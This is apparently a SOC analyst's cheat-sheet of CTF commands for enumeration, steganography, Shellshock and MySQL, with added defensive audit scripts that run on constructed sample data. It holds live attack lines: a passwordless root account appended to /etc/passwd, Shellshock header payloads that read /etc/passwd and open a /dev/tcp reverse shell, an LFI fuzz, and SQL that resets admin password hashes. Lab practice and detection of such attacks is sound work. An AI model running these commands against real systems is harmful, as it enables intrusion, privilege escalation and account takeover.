My Notes

Hello! I’m a SOC analyst and cybersecurity enthusiast. In my free time, I enjoy practicing on CTFs and writing up about them.

Linux

Base64 decoder

echo 'SGVsbG8gV29ybGQg' | base64 -d

Start a Python server

python3 -m http.server 81

Transfer files with netcat

Receiving machine (start the listener first)

nc -lvnp <PORT> > <NEW FILE NAME>

Sending machine

nc <IP> <PORT> < <FILE>

tee

Add a user with UID 0 (root) by appending a passwd entry through a tee binary that sudo lets you run as root

echo "persecure::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
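The entry appended above has seven colon-separated fields (name, password, UID, GID, GECOS, home, shell): an empty password field and UID/GID 0 is exactly what a defender should be looking for. The following is an added example, not part of the original notes, that audits a passwd-format file for such entries; the function names and the constructed sample file are my own.

```shell
# audit_passwd FILE: print one line per suspicious entry in a passwd-format file.
#   extra-uid0:<name>      -> UID 0 account that is not "root"
#   empty-password:<name>  -> empty password field (field 2)
# Defaults to /etc/passwd when no file is given.
audit_passwd() {
    awk -F: '
        NF < 7 { next }                                   # skip malformed lines
        $3 == 0 && $1 != "root" { print "extra-uid0:" $1 }
        $2 == ""                { print "empty-password:" $1 }
    ' "${1:-/etc/passwd}"
}

# sample_passwd: write a constructed passwd file (not a real system file) containing
# a normal root entry, two ordinary accounts and the line the note above appends.
# Prints the path of the temporary file.
sample_passwd() {
    f=$(mktemp)
    printf '%s\n' \
        'root:x:0:0:root:/root:/bin/bash' \
        'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin' \
        'alice:x:1000:1000:alice:/home/alice:/bin/bash' \
        'persecure::0:0:::/bin/bash' > "$f"
    echo "$f"
}

# Usage: audit_passwd "$(sample_passwd)"    # or: audit_passwd /etc/passwd
```

Running it against the sample prints both findings for the "persecure" entry and nothing for the legitimate accounts; on a live host the same function gives a quick check that no second UID 0 account has been planted.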

Bypass restricted shell

https://www.hacknos.com/rbash-escape-rbash-restricted-shell-escape/


Enumeration

Search for nmap scripts

ls -la /usr/share/nmap/scripts | grep -e "<SEARCH>"

Gobuster web directory enum

gobuster dir -u <ADDRESS>/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html,config,sh -f

RPC

Command                      Description
showmount -a <IP ADDRESS>    Show mount information for an NFS server
rpcinfo -p <IP ADDRESS>      Report RPC information

Locate setuid binaries

find /usr/bin/ -perm -4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
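The two find commands above list every setuid file; what usually matters is which of them is new. Added example (not from the original notes): the same find predicate wrapped in a function, plus a comparison against a known-good baseline so only unexpected setuid binaries are printed. The fixture function builds a throwaway directory tree for demonstration; function names and paths are my own.

```shell
# list_suid DIR: setuid regular files under DIR, sorted so the output can be stored
# as a baseline or diffed later. Same predicate as the one-liners above.
list_suid() {
    find "$1" -perm -4000 -type f 2>/dev/null | sort
}

# unexpected_suid DIR BASELINE: setuid files under DIR that are not listed in BASELINE
# (one absolute path per line). grep -vxF drops exact matches; "|| :" keeps the
# exit status clean when nothing unexpected is left.
unexpected_suid() {
    list_suid "$1" | grep -vxF -f "$2" || :
}

# make_suid_fixture: constructed test tree (not a real system) with two setuid files,
# only one of which is in the baseline. Prints "<tree> <baseline-file>".
make_suid_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/bin"
    printf '#!/bin/sh\nexit 0\n' > "$d/bin/legit"
    printf '#!/bin/sh\nexit 0\n' > "$d/bin/planted"
    chmod 4755 "$d/bin/legit" "$d/bin/planted"      # set the setuid bit on both
    printf '%s\n' "$d/bin/legit" > "$d/baseline.txt"
    echo "$d $d/baseline.txt"
}

# Usage: set -- $(make_suid_fixture); unexpected_suid "$1" "$2"
# On a real host: list_suid / > baseline.txt once, then unexpected_suid / baseline.txt
```

Store the baseline off-box; a setuid binary that appears after the baseline was taken is worth an explanation, whoever put it there.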

mysqldump

mysqldump -u <USER> -p<PASSWORD> <DATABASE> users

SMB Enumeration

nmblookup -A <IP>
smbmap -H <IP>
echo exit | smbclient -L //<IP>
nmap --script smb-enum-shares -p 139,445 <IP>
smbclient //<IP>/<SHARE NAME>
nmap --script smb-vuln* -p 139,445 <IP>

ffuf

ffuf -c -r -u 'http://192.168.18.12/secret/evil.php?FUZZ=/etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/common.txt -fs 0

Wpscan

wpscan --url <URL> --enumerate p --enumerate t --enumerate u
wpscan --url <URL> -U users -P wordlists.txt

Curl

Spoof the user agent as a search-engine crawler (for pages that serve different content to bots)

curl -v --user-agent "Googlebot/2.1 (+http://www.google.com/bot.html)" <URL>


Tools

Steganography tools

steghide extract -sf <IMAGE>
steghide extract -sf <IMAGE> -p <PASSPHRASE>

Crack passphrase

stegcracker <IMAGE> /usr/share/wordlists/rockyou.txt

Windows exploit suggester

Download script here

It requires the output of the 'systeminfo' command from the Windows host

./windows-exploit-suggester.py --update
./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt

Exploits

Shellshock

Scan for shellshock vulnerability

nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <target>

Test for shellshock vulnerability

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://192.168.18.12:80/cgi-bin/test.sh

Reverse Shell

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/192.168.18.2/1234 0>&1'" http://192.168.18.12/cgi-bin/test.sh
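Both requests above put the Shellshock trigger "() {" in the User-Agent header, and the "combined" log format of Apache and nginx records that header, so the attempt is visible in the access log. Added example (not from the original notes): a small detector run over constructed log lines. The function names and the sample log are my own; the log is made up, not a real capture.

```shell
# shellshock_hits LOG: print every log line containing the function-definition
# prefix "() {" (optional whitespace between the parentheses and the brace).
shellshock_hits() {
    grep -E '\(\)[[:space:]]*[{]' "$1" || :
}

# shellshock_hit_count LOG: number of matching lines, as a bare integer.
shellshock_hit_count() {
    shellshock_hits "$1" | wc -l | tr -d ' '
}

# sample_access_log: constructed combined-format log with one plain request,
# one crawler request and one request carrying the trigger against a CGI path.
# Prints the path of the temporary file.
sample_access_log() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
192.168.18.2 - - [01/Jan/2024:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.18.2 - - [01/Jan/2024:10:00:01 +0000] "GET /robots.txt HTTP/1.1" 200 44 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
192.168.18.2 - - [01/Jan/2024:10:00:02 +0000] "GET /cgi-bin/test.sh HTTP/1.1" 200 0 "-" "() { :; }; echo; echo; /bin/bash -c 'id'"
EOF
    echo "$f"
}

# Usage: shellshock_hits "$(sample_access_log)"    # or: shellshock_hits /var/log/apache2/access.log
```

The pattern deliberately keys on the bash function-definition prefix rather than on any particular command, since the payload after it varies; a hit against a /cgi-bin/ path on a host that has not been patched is the case to escalate.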

MYSQL

Password hash update

UPDATE wp_users SET user_pass="e10adc3949ba59abbe56e057f20f883e" WHERE ID=1;

Password hash update 2

update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask'),''),'persecure'))) where username = 'admin';